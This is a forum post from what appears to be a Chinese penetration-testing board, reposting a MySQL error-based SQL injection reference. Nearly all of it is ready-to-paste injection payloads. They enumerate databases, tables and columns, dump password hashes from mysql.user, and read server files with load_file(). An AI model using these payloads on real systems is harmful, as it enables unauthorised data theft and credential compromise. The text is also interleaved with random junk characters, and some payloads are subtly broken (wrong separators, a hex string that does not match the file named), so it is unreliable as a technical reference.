中国网络渗透测试联盟

标题: Mysql暴错注入参考（pdf） [打印本页]

---

作者: admin    时间: 2013-7-27 11:00
标题: Mysql暴错注入参考（pdf）
本帖最后由 Nightmare 于 2013-3-17 14:20 编辑
, c! |3 K1 d& D- X" _, e9 D+ a

( E" o  U9 L* G" @Mysql暴错注入参考（pdf），每天一贴。。。

MySql Error Based Injection Reference
, I7 i9 X: s. f; p( F  c[Mysql暴错注入参考]
Authornig0s1992
: c% K! k" B8 E/ w3 @* o+ f4 VBlog:http://pnig0s1992.blog.51cto.com/
TeAm:http://www.FreeBuf.com/
Mysql5.0.91下测试通过,对于5+的绝大部分版本可以测试成功
, h6 F  [  {- t. D  `; }3 V小部分版本使用name_const()时会报错.可以用给出的Method.2测试
+ J! f( `- z" `5 N4 `查询版本:
8 o5 R0 w7 @9 d+ U4 ]Method.1:and+exists(select*from+(select*from(select+name_const(@@version,0))a+
2 h' X8 }  E0 U# wjoin+(select+name_const(@@version,0))b)c)
Method.2:and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+version()))a+from+information_schema.tables+gro
, l" K" Y, H0 ~4 X8 X: k1 zup by a)b)
* L* |5 A$ T! I2 }' A6 h# i查询当前用户:
Method.1:and+exists(select*from+(select*from(select+name_const(user(),0))a+join+(select+name_const(user(),0))b)c)
Method.2:and+(select+1+from(select+count(*),concat((select+(select+user())+from+information_schema.tables+limit+0,1).floor(r
and(0)*2))x+from+information_schema.tables+group+by+x)a)
查询当前数据库:
Method.1:and+exists(select*from+(select*from(select+name_const(database(),0))a+join+(select+name_const(database(),0))b)c)
: X; p! _* t& Q( ?! B+ rMethod.2:and+(select+1+from(select+count(*),concat((select+(select+database())+from+information_schema.tables+limit+0,1).flo
! \$ O3 G% B, @or(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
; D) U( u  x/ T3 w& w依次爆库and+exists(select*from+(select*from(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+
LIMIT+n,1),0))a+join+(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))b)c) 将n
  r2 G/ f8 e0 Y6 ?. H& T顺序替换
爆指定库数目:
* W- s& u/ P* A, nand+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(table_name)+FROM+`information_schema`.tables+WHERE+t
able_schema=0x6D7973716C))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group
% U% q" r6 Y& F1 z8 X* o1 Y# R: x: s+by+x)a)+and+1=1 0x6D7973716C=mysql
7 b3 ^+ d$ _) d& ^  D; L5 q依次爆表:
! J) g2 M2 X" Y% @$ pand+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+table_name+FROM+information_schema.tables+Where+t
able_schema=0x6D7973716C+limit+n,1))+from+information_schema.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.ta
bles+group+by+x)a)+and+1=1
' F( L) {' S3 w3 h5 Y0x6D7973716C=Mysql 将n顺序替换
爆表内字段数目:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(column_name)+FROM+`information_schema`.columns+WHERE
+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976))+from+information_schema.tables+limit+0,1),floor(ran
7 A0 M, U# D( s6 S# o' B0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
依次爆字段:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+column_name+FROM+information_schema.columns+Where
+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976+limit+n,1))+from+information_schema.tables+limit+0,1
loor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1  将n顺序替换
依次暴内容:
and+(select+1+from(select+count(*),concat((select+(select+(select+password+from+mysql.user+limit+n,1))+from+information_sche
ma.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
将n顺序替换
爆文件内容:
and+(SELECT+1+FROM+(select count(*),concat(floor(rand(0)*2),(SELECT+substring(load_file(0x433A5C5C746573742E617361),1,64)))a
. _. }; d  j- ?; ~1 S) t7 s1 Cfrom+information_schema.tables+group+by+a)b)
+ A, c- d) A/ F  o& }0x433A5C5C626F6F742E696E69=C:\\boot.ini 因为只能爆出64字节的内容,需要用Substring()控制显示的字节
0 i- W4 K% z3 w* YThx for reading.

不要下载也可以，
) w3 _) N$ w7 F! Z  R6 r/ I- l, n

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2